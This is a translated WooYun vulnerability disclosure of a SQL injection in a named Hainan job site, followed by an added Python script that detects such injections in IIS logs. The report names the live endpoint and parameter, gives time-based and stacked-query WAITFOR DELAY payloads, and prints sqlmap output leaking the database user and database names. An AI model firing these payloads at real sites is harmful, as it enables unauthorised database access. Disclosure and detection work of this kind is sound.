Vulnerability Summary

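Bug ID: wooyun-2015-0154577

Title: SQL injection in the main site of 琼州人才网, a 伍亿 property (13 databases involved / time-delay injection)

Vendor: 海南人才招聘网

Author: 路人甲

Submitted: 2015-11-20 15:46

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 11

Status: Unable to contact the vendor, or the vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]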


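Vulnerability Details

Disclosure status:

2015-11-20: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2016-01-11: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

RT

Detailed description:

Injection point, time-delay injection
http://www.hnrczpw.com/gposinfo/freejobs/searchcls/inducls.asp?id=120100
Data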

Place: GET
Parameter: id
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=120100'; WAITFOR DELAY '0:0:5';-- AND 'lkGY'='lkGY
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=120100' WAITFOR DELAY '0:0:5'-- AND 'wbjf'='wbjf
---
[15:02:02] [INFO] testing MySQL
[15:02:02] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[15:02:04] [WARNING] the back-end DBMS is not MySQL
[15:02:04] [INFO] testing Oracle
[15:02:05] [WARNING] the back-end DBMS is not Oracle
[15:02:05] [INFO] testing PostgreSQL
[15:02:07] [WARNING] the back-end DBMS is not PostgreSQL
[15:02:07] [INFO] testing Microsoft SQL Server
[15:02:13] [INFO] confirming Microsoft SQL Server
[15:02:24] [INFO] adjusting time delay to 4 seconds due to good response times
[15:02:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[15:02:29] [INFO] fetching current user
[15:02:29] [INFO] retrieved: userjxrc
current user: 'userjxrc'


13 databases involved

[15:12:22] [INFO] adjusting time delay to 4 seconds due to good re
13
[15:12:27] [INFO] retrieved:
[15:12:55] [ERROR] invalid character detected. retrying..
[15:12:55] [WARNING] increasing time delay to 5 seconds
adsys
[15:14:55] [INFO] retrieved: di
[15:16:14] [ERROR] invalid character detected. retrying..
[15:16:14] [WARNING] increasing time delay to 6 seconds
st
[15:18:49] [ERROR] invalid character detected. retrying..
[15:18:49] [WARNING] increasing time delay to 7 seconds
er
[15:19:49] [INFO] retrieved:
[15:20:53] [ERROR] invalid character detected. retrying..
[15:20:53] [WARNING] increasing time delay to 8 seconds
[15:23:13] [ERROR] invalid character detected. retrying..
[15:23:13] [WARNING] increasing time delay to 9 seconds
mo


Too slow, it did not finish running

Proof of vulnerability:

Fix:

Copyright notice: when reposting, please credit the source 路人甲@乌云
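
The payloads in the report place `WAITFOR DELAY` in the `id` parameter of `inducls.asp`, which otherwise carries a plain integer (120100). As an added example that is not part of the original report, this Python script scans IIS W3C log lines for non-integer `id` values and compares any requested delay with `time-taken` to separate delays the database actually executed from ones that were only attempted. The log lines and their field order are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines (not from the report); assumed field order:
# date time cs-method cs-uri-stem cs-uri-query sc-status time-taken (ms).
STEM = "/gposinfo/freejobs/searchcls/inducls.asp"
SAMPLE_LOG = f"""\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status time-taken
2015-11-20 07:01:58 GET {STEM} id=120100 200 212
2015-11-20 07:02:13 GET {STEM} id=120100'+WAITFOR+DELAY+'0:0:5'--+AND+'wbjf'='wbjf 200 5240
2015-11-20 07:02:20 GET {STEM} id=120100%27%3B+WAITFOR+DELAY+%270%3A0%3A4%27%3B-- 200 4198
2015-11-20 07:02:31 GET {STEM} id=120100'+WAITFOR+DELAY+'0:0:5'-- 500 95
2015-11-20 07:02:40 GET {STEM} id=120100+AND+1=1 200 180
"""
DELAY_RE = re.compile(r"WAITFOR\s+DELAY\s+'(\d+):(\d+):(\d+)'", re.I)

def id_value(query):
    """Return the URL-decoded value of the id parameter, or None if absent."""
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name.lower() == "id":
            return unquote_plus(value)
    return None

def classify(value, time_taken_ms):
    """Verdict for one id value; None means missing or a plain integer."""
    if value is None or re.fullmatch(r"[0-9]+", value):
        return None
    m = DELAY_RE.search(value)
    if not m:
        return "non-numeric-id"
    hours, minutes, seconds = (int(g) for g in m.groups())
    delay_ms = (hours * 3600 + minutes * 60 + seconds) * 1000
    # A response at least as slow as the requested delay means the DBMS ran it.
    return "delay-executed" if time_taken_ms >= delay_ms else "delay-attempted"

def scan(log_text, stem=STEM):
    """Return (time, verdict) for every suspicious request to the given page."""
    findings = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        _date, time, _method, uri, query, _status, taken = line.split()
        if uri.lower() != stem:
            continue
        verdict = classify(id_value(query), int(taken))
        if verdict:
            findings.append((time, verdict))
    return findings
```

A `delay-executed` verdict indicates the statement reached SQL Server, so the page concatenates `id` into its query and needs parameterized queries or strict integer validation.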


Vulnerability Response

Vendor response:

Unable to contact the vendor, or the vendor actively refused